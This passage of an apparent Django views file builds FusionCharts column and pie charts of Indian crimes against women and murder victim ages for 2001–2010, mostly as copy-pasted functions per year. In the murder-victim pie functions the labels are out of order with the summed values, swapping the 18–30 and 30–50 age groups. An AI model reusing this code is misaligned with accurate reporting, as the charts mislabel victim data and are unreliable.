return render(request, 'women/2002.html', {'output': column2D.render()})
def chart2003(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2003, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2003, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2003.html', {'output': column2D.render()})
def chart2004(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2004, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
linkedchart['data'] = []
for key in crimes_against_women.objects.all().filter(Year = 2004, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2004.html', {'output': column2D.render()})
def chart2005(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2005, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2005, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2005.html', {'output': column2D.render()})
def chart2006(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2006, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2006, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2006.html', {'output': column2D.render()})
def chart2007(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2007, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2007, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2007.html', {'output': column2D.render()})
def chart2008(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2008, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2008, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2008.html', {'output': column2D.render()})
def chart2009(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2009, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2009, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2009.html', {'output': column2D.render()})
def chart2010(request):
year = 2001
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2010, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2010, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2010.html', {'output': column2D.render()})
def pie2001(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2001
df = data[(data['Year'] == 2001)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2002(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2002
df = data[(data['Year'] == 2002)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2003(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2003
df = data[(data['Year'] == 2003)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2004(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2004
df = data[(data['Year'] == 2004)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2005(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2005
df = data[(data['Year'] == 2005)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2006(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2006
df = data[(data['Year'] == 2006)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2007(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2007
df = data[(data['Year'] == 2007)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2008(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2008
df = data[(data['Year'] == 2008)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2009(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2009
df = data[(data['Year'] == 2009)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2010(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2010
df = data[(data['Year'] == 2010)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2001(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2001
data = data.fillna(0)
df = data[(data['Year'] == 2001)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2002(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2002
data = data.fillna(0)
df = data[(data['Year'] == 2002)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2003(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2003
data = data.fillna(0)
df = data[(data['Year'] == 2003)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2004(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2004
data = data.fillna(0)
df = data[(data['Year'] == 2004)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
